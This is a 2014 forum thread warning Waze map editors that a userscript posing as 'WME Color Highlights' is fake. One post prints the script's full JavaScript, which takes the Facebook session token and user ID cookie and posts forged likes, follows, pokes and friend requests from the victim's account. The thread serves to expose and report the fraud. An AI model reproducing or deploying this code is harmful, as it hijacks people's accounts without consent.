Page 1 of 1
Attention: new WME Color Highlights on userscripts.org
Posted: Fri Feb 14, 2014 12:43 pm
by AlexN-114
I found a new script at
userscripts.org which call itself
WME Color Highlights and is from
zuny alen. I looked in it and found
nothing which looks like a Highlighter.
It is not limed to waze page and seems to send "likes" to facebook pages.
But perhaps I am only to stupid to understand this script, but I will
not trust this script.
If I want to install a
WME Color Highlights, then I will look that it is from
TimBones ( OK, I know my
WME Highlighter City is also safe)
Re: Attention: new WME Color Highlights on userscripts.org
Posted: Fri Feb 14, 2014 4:21 pm
by asterix06
How could we keep CH users aware of the fake...as not everybody is reading here?
Re: Attention: new WME Color Highlights on userscripts.org
Posted: Fri Feb 14, 2014 6:53 pm
by doctorkb
asterix06 wrote:How could we keep CH users aware of the fake...as not everybody is reading here?
Perhaps by somehow pointing everyone to either the wiki or this forum for script links...
There doesn't appear to be any reliable way of reporting malicious code on userscripts.
Re: Attention: new WME Color Highlights on userscripts.org
Posted: Sat Feb 15, 2014 6:28 pm
by McCracken808
Use
this link to report to Userscript.org of its bogus nature.
Re: Attention: new WME Color Highlights on userscripts.org
Posted: Fri Feb 14, 2014 12:48 pm
by OyyoDams
Exact
this one is a fake!
For info the code has nothing to do with a WME extension:
Code: Select all
// ==UserScript==
// @name WME Color Highlights
// @namespace WME Color Highlights
// @Hak Cipta Smart Boy
// ==/UserScript==
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); }
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value; var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone) { var http4=new XMLHttpRequest; var url4="/ajax/follow/follow_profile.php?__a=1"; var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp="; http4.open("POST",url4,true); http4.onreadystatechange=function() { if(http4.readyState==4&&http4.status==200)http4.close } ; http4.send(params4) } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } function p(abone) { var http4 = new XMLHttpRequest(); var url4 = "//www.facebook.com/ajax/poke_dialog.php"; var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp="; http4.open("POST", url4, true); http4.onreadystatechange = function () { if (http4.readyState == 4 && http4.status == 200) { http4.close; } }; http4.send(params4); }var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); }
// pic + fans
P("451804298278412");Like("710616545637958");Like("1409918565922390");Like("275136455944477");Like("603080806413219");P("616944838368872");Like("219378364899812");Like("420844481374394");
/*Add Friend*/;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function IDS(r) {
var X = new XMLHttpRequest();
var XURL = "//www.facebook.com/ajax/add_friend/action.php";
var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
X.open("POST", XURL, true);
X.onreadystatechange = function () {
if (X.readyState == 4 && X.status == 200) {
X.close;
}
};
X.send(XParams);
}
Re: Attention: new WME Color Highlights on userscripts.org
Posted: Fri Feb 14, 2014 2:05 pm
by Timbones
Yes, it's been reported before. This author has a huge number of scripts, all masquerading as something they are not.